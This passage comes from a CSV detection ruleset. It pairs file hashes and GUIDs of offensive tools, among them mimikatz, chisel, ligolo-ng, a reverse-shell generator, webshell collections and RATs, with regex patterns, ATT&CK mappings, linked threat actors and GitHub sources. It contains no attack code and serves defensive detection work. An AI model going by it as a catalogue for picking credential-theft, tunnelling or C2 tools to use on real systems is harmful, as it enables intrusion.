It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","21618" "*0d45502cdd00e1f2a8864ef450dc532497f817f7596c105933e1eb9054186bf3*",".{0,1000}0d45502cdd00e1f2a8864ef450dc532497f817f7596c105933e1eb9054186bf3.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","21619" "*0d4ab1674ad2b13652979d996a41f55a353eb2f32f854a95c7068e66c072f63c*",".{0,1000}0d4ab1674ad2b13652979d996a41f55a353eb2f32f854a95c7068e66c072f63c.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","21620" "*0d567a5d498809a5595567f9b172fec85c7bd4911da60ce4f2f1729de0bed739*",".{0,1000}0d567a5d498809a5595567f9b172fec85c7bd4911da60ce4f2f1729de0bed739.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - 
T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21621" "*0d624761a03e400013f8372b931e658ceafef28f87574fc3af0421264ebbcb09*",".{0,1000}0d624761a03e400013f8372b931e658ceafef28f87574fc3af0421264ebbcb09.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","21622" "*0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9*",".{0,1000}0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21623" "*0d6ab504d6e011e57dad5e5173dcfe3d7e1234ad3edaf880437071eaad3c2550*",".{0,1000}0d6ab504d6e011e57dad5e5173dcfe3d7e1234ad3edaf880437071eaad3c2550.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21624" 
"*0d6fe7acb2fe628db16ac731cea9e9e0d430ff5bbc5f04cfd6700b58ea54c168*",".{0,1000}0d6fe7acb2fe628db16ac731cea9e9e0d430ff5bbc5f04cfd6700b58ea54c168.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","21625" "*0d72b72773bb854b9dcdc83c5a0f76bcc5a6a1a344f28f81500d6aaaf8d2e69d*",".{0,1000}0d72b72773bb854b9dcdc83c5a0f76bcc5a6a1a344f28f81500d6aaaf8d2e69d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21626" "*0d756650eb56b7e3ffc5f27c01933fb3b4ada09b77b77959ea4178a0f46fc8c8*",".{0,1000}0d756650eb56b7e3ffc5f27c01933fb3b4ada09b77b77959ea4178a0f46fc8c8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21627" "*0d773444d899ab08f8aaee56dec0fb17928784dca205ef25af61a71bf4fb6e3f*",".{0,1000}0d773444d899ab08f8aaee56dec0fb17928784dca205ef25af61a71bf4fb6e3f.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","21628" "*0d83ecf5fae3ecc043b537d33c162d01c6a1171eb27e2e3862e8cc7df328830c*",".{0,1000}0d83ecf5fae3ecc043b537d33c162d01c6a1171eb27e2e3862e8cc7df328830c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21631" "*0d8cac6cbe2019d99a5260f4c934d9a4c9c7022d141006cfc0f87fdc3f8ae4ab*",".{0,1000}0d8cac6cbe2019d99a5260f4c934d9a4c9c7022d141006cfc0f87fdc3f8ae4ab.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","21633" "*0d8d349782ea9510389351185bac60105d17c181a9271f7ab99f6d2c886eda7e*",".{0,1000}0d8d349782ea9510389351185bac60105d17c181a9271f7ab99f6d2c886eda7e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21634" "*0d8e9a6a82a88a754aee39087957d95fa2cf4dae8a0b931e61934b69bfc4c491*",".{0,1000}0d8e9a6a82a88a754aee39087957d95fa2cf4dae8a0b931e61934b69bfc4c491.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - 
T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21635" "*0d8f5888bc6e02085496b4a070b39169bdea67051b1a9f7af21b29de9615842e*",".{0,1000}0d8f5888bc6e02085496b4a070b39169bdea67051b1a9f7af21b29de9615842e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21637" "*0da34db46173eeb7c06ceb9732d5006a6463c802c5ac9bf2b0e40084b207f760*",".{0,1000}0da34db46173eeb7c06ceb9732d5006a6463c802c5ac9bf2b0e40084b207f760.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21639" "*0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8*",".{0,1000}0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21640" "*0da9a753ed44b2716f2434ef664cf46c3ece2b7d5fc1ce810800dd8d23996113*",".{0,1000}0da9a753ed44b2716f2434ef664cf46c3ece2b7d5fc1ce810800dd8d23996113.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","21641" "*0dayCTF/reverse-shell-generator*",".{0,1000}0dayCTF\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","21642" "*0db0228defb8d913de486d4f799be97bc75b5aa2ae72c2fc1e99389aeb92b170*",".{0,1000}0db0228defb8d913de486d4f799be97bc75b5aa2ae72c2fc1e99389aeb92b170.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","21643" "*0db3092377cd7af2f253b637374742921b7db93b6d395ede84a826a14d2ad7cb*",".{0,1000}0db3092377cd7af2f253b637374742921b7db93b6d395ede84a826a14d2ad7cb.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash 
#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21644" "*0db6b9e5973f2dd2d84c417208e3fcd2d03dad3fd981028a2ded5ff9969ca325*",".{0,1000}0db6b9e5973f2dd2d84c417208e3fcd2d03dad3fd981028a2ded5ff9969ca325.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21646" "*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass 
- Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21647" "*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21648" "*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - 
APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21649" "*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - 
Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21650" "*0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d*",".{0,1000}0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21651" "*0dbf95a658e7bb4b339b218820a894d06c8fe755e2cff0681a5456ca5b1b5723*",".{0,1000}0dbf95a658e7bb4b339b218820a894d06c8fe755e2cff0681a5456ca5b1b5723.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21653" "*0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff*",".{0,1000}0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21656" "*0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2*",".{0,1000}0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21657" "*0dcb4aca167ac5f020dc3b55e8db707560a592152131fd78484392172107b688*",".{0,1000}0dcb4aca167ac5f020dc3b55e8db707560a592152131fd78484392172107b688.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21658" "*0dcbd6cce79f768d9e9b79bc8c86be279779120b8232e32c1f3198ee56653518*",".{0,1000}0dcbd6cce79f768d9e9b79bc8c86be279779120b8232e32c1f3198ee56653518.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21659" "*0DD419E5-D7B3-4360-874E-5838A7519355*",".{0,1000}0DD419E5\-D7B3\-4360\-874E\-5838A7519355.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","21660" "*0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef*",".{0,1000}0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21661" "*0dd54eef6deb3608d8e9b119c526cd6b1311c3256006f331f6646022cabf4fae*",".{0,1000}0dd54eef6deb3608d8e9b119c526cd6b1311c3256006f331f6646022cabf4fae.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21662" "*0ddeb7336ac9bd123fe9fa3713066dc00b676aa8c0be0d7191732fa3e6602111*",".{0,1000}0ddeb7336ac9bd123fe9fa3713066dc00b676aa8c0be0d7191732fa3e6602111.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21663" 
"*0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a*",".{0,1000}0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","21664" "*0DE8DA5D-061D-4649-8A56-48729CF1F789*",".{0,1000}0DE8DA5D\-061D\-4649\-8A56\-48729CF1F789.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","21665" "*0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992*",".{0,1000}0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","21667" "*0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466*",".{0,1000}0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21668" "*0defeb7a564d2f4f237d89ae63065e78af68b0febda5927f25722696593bf42e*",".{0,1000}0defeb7a564d2f4f237d89ae63065e78af68b0febda5927f25722696593bf42e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21669" "*0df149772508a04604ef6e5a1bd46715b95c81bd327e0ab9ca912d82a0bc82b4*",".{0,1000}0df149772508a04604ef6e5a1bd46715b95c81bd327e0ab9ca912d82a0bc82b4.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash 
